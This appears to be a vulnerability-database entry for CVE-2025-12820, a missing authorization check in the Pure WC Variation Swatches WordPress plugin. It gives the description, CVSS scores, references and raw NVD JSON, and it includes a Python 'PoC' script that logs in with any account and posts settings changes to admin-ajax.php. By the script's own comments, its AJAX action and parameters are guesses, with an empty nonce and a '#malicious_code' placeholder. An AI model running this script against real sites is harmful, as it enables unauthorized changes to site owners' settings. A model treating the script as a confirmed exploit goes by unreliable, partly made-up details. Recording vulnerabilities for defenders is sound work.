CVE-2025-12820

Description

The Pure WC Variation Swatches WordPress plugin through 1.1.7 does not have an authorization check when updating its settings, which could allow any authenticated users to update them.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Pure WC Variation Swatches WordPress Plugin <= 1.1.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-12820 PoC - Pure WC Variation Swatches Authorization Bypass
# Target: WordPress site with Pure WC Variation Swatches plugin <= 1.1.7

target_url = "http://target-wordpress-site.com"
# Attacker needs a valid WordPress account (any role)
username = "attacker_user"
password = "attacker_password"

# Login to WordPress to get authentication cookies
session = requests.Session()
login_url = f"{target_url}/wp-login.php"
login_data = {
    "log": username,
    "pwd": password,
    "wp-submit": "Log In"
}

session.post(login_url, data=login_data)

# Exploit: Update plugin settings without proper authorization
# The plugin's settings endpoint lacks capability checks
settings_url = f"{target_url}/wp-admin/admin-ajax.php"
exploit_data = {
    "action": "pure_wc_variation_swatches_save_settings",
    "swatch_color": "#malicious_code",
    "swatch_size": "100",
    "nonce": ""  # May not be required due to missing check
}

response = session.post(settings_url, data=exploit_data)
print(f"Response Status: {response.status_code}")
print(f"Response: {response.text}")

# Note: This PoC demonstrates the authorization bypass vulnerability.
# Actual exploitation requires identifying the correct AJAX action and parameters.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12820
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12820
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12820/
[4] VulDB https://vuldb.com/cve/CVE-2025-12820
[5] https://wpscan.com/vulnerability/36ccd54a-265a-44d5-b788-bc14446e3098/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12820", "sourceIdentifier": "[email protected]", "published": "2025-12-20T06:15:50.813", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Pure WC Variation Swatches WordPress plugin through 1.1.7 does not have an authorization check when updating its settings, which could allow any authenticated users to update them."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/36ccd54a-265a-44d5-b788-bc14446e3098/", "source": "[email protected]"}]}}